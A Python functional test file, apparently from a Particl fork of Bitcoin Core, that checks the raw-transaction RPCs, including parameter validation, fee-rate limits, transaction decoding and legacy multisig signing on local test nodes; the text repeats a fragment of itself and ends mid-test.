tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = tx.serialize().hex()
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
"""
# Removed as collides with particl version
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = tx.serialize().hex()
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
"""
def raw_multisig_transaction_legacy_tests(self):
self.log.info("Test raw multisig transactions (legacy)")
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
# createmultisig can only take public keys
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1])
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
# use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 BTC to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
# node2 has both keys of the 2of2 ms addr, tx should affect the balance
assert_equal(self.nodes[2].getbalance(), bal + Decimal('1.20000000'))
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
# THIS IS AN INCOMPLETE FEATURE
# NODE2 HAS TWO OF THREE KEYS AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) # for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "amount": vout['value']}]
outputs = {self.nodes[0].getnewaddress(): 2.19}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) # node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) # node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000')) # block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "redeemScript": mSigObjValid['hex'], "amount": vout['value']}]
outputs = {self.nodes[0].getnewaddress(): 2.19}
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) # node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) # node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000')) # block reward + tx
if __name__ == '__main__':
RawTransactionsTest().main()
| #!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- getrawtransaction
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.messages import (
CTransaction,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
)
TXID = "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000"
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 4
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
[],
]
# whitelist all peers to speed up tx relay / mempool sync
for args in self.extra_args:
args.append("-whitelist=noban@127.0.0.1")
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info("Prepare some coins for multiple *rawtransaction commands")
self.generate(self.nodes[2], 1)
self.sync_all()
self.generate(self.nodes[0], COINBASE_MATURITY + 1)
self.sync_all()
for amount in [1.5, 1.0, 5.0]:
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), amount)
self.sync_all()
self.generate(self.nodes[0], 5)
self.sync_all()
self.getrawtransaction_tests()
self.createrawtransaction_tests()
self.signrawtransactionwithwallet_tests()
self.sendrawtransaction_tests()
self.sendrawtransaction_testmempoolaccept_tests()
self.decoderawtransaction_tests()
self.transaction_version_number_tests()
if not self.options.descriptors:
self.raw_multisig_transaction_legacy_tests()
def getrawtransaction_tests(self):
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.generate(self.nodes[0], 1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.generate(self.nodes[0], 1)
self.sync_all()
for n in [0, 3]:
self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex")
# 1. valid parameters - only supply txid
assert_equal(self.nodes[n].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[n].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and invalid boolean values (strings) for verbose
for value in ["True", "False"]:
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txid=txId, verbose=value)
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, {})
# Make a tx by sending, then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.generate(self.nodes[2], 2)
self.sync_all()
for n in [0, 3]:
self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex, with blockhash")
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
if n == 0:
self.log.info("Test getrawtransaction with -txindex, without blockhash: 'in_active_chain' should be absent")
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True)
assert_equal(gottx['txid'], tx)
assert 'in_active_chain' not in gottx
else:
self.log.info("Test getrawtransaction without -txindex, without blockhash: expect the call to raise")
err_msg = (
"No such mempool transaction. Use -txindex or provide a block hash to enable"
" blockchain transaction queries. Use gettransaction for wallet transactions."
)
assert_raises_rpc_error(-5, err_msg, self.nodes[n].getrawtransaction, txid=tx, verbose=True)
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[n].getrawtransaction, txid=tx, blockhash=block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[n].getrawtransaction, txid=tx, blockhash=True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[n].getrawtransaction, txid=tx, blockhash="foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[n].getrawtransaction, txid=tx, blockhash="abcd1234")
foo = "ZZZ0000000000000000000000000000000000000000000000000000000000000"
assert_raises_rpc_error(-8, f"parameter 3 must be hexadecimal string (not '{foo}')", self.nodes[n].getrawtransaction, txid=tx, blockhash=foo)
bar = "0000000000000000000000000000000000000000000000000000000000000000"
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[n].getrawtransaction, txid=tx, blockhash=bar)
# Undo the blocks and verify that "in_active_chain" is false.
self.nodes[n].invalidateblock(block1)
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[n].reconsiderblock(block1)
assert_equal(self.nodes[n].getbestblockhash(), block2)
self.log.info("Test getrawtransaction on genesis block coinbase returns an error")
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
def createrawtransaction_tests(self):
self.log.info("Test createrawtransaction")
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
txid = "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844"
assert_raises_rpc_error(-8, f"txid must be hexadecimal string (not '{txid}')", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': -1}], {})
# sequence number out of range
for invalid_seq in [-1, 4294967296]:
inputs = [{'txid': TXID, 'vout': 1, 'sequence': invalid_seq}]
outputs = {self.nodes[0].getnewaddress(): 1}
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range',
self.nodes[0].createrawtransaction, inputs, outputs)
# with valid sequence number
for valid_seq in [1000, 4294967294]:
inputs = [{'txid': TXID, 'vout': 1, 'sequence': valid_seq}]
outputs = {self.nodes[0].getnewaddress(): 1}
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], valid_seq)
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Particl address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
# Test that createrawtransaction accepts an array and object as outputs
# One output
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs={address: 99}))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
def signrawtransactionwithwallet_tests(self):
for type in ["bech32", "p2sh-segwit", "legacy"]:
self.log.info(f"Test signrawtransactionwithwallet with missing prevtx info ({type})")
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
inputs = [{'txid': TXID, 'vout': 3, 'sequence': 1000}]
outputs = {self.nodes[0].getnewaddress(): 1}
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=TXID, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
else:
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"vout": 3,
"amount": 1
}
])
def sendrawtransaction_tests(self):
self.log.info("Test sendrawtransaction with missing input")
inputs = [{'txid': TXID, 'vout': 1}] # won't exist
outputs = {self.nodes[0].getnewaddress(): 4.998}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
def sendrawtransaction_testmempoolaccept_tests(self):
self.log.info("Test sendrawtransaction/testmempoolaccept with maxfeerate")
fee_exceeds_max = "Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)"
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{"txid": txId, "vout": vout['n']}]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 BTC/sat)) = 0.9999
outputs = {self.nodes[0].getnewaddress(): Decimal("0.99990000")}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 BTC/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{"txid": txId, "vout": vout['n']}]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 BTC/sat)) = 0.98
outputs = {self.nodes[0].getnewaddress() : Decimal("0.98000000")}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 BTC/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
self.log.info("Test sendrawtransaction/testmempoolaccept with tx already in the chain")
self.generate(self.nodes[2], 1)
self.sync_blocks()
for node in self.nodes:
testres = node.testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'txn-already-known')
assert_raises_rpc_error(-27, 'Transaction already in block chain', node.sendrawtransaction, rawTxSigned['hex'])
def decoderawtransaction_tests(self):
self.log.info("Test decoderawtransaction")
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
coinbase = "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000"
encrawtx = f"020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b{coinbase}" \
"ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], coinbase)
def transaction_version_number_tests(self):
self.log.info("Test transaction version numbers")
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = tx.serialize().hex()
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
"""
# Removed as collides with particl version
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = tx.serialize().hex()
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
"""
def raw_multisig_transaction_legacy_tests(self):
self.log.info("Test raw multisig transactions (legacy)")
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
# createmultisig can only take public keys
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1])
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
# use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 BTC to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
# node2 has both keys of the 2of2 ms addr, tx should affect the balance
assert_equal(self.nodes[2].getbalance(), bal + Decimal('1.20000000'))
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
# THIS IS AN INCOMPLETE FEATURE
# NODE2 HAS TWO OF THREE KEYS AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) # for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "amount": vout['value']}]
outputs = {self.nodes[0].getnewaddress(): 2.19}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) # node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) # node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.generate(self.nodes[0], 1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000')) # block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
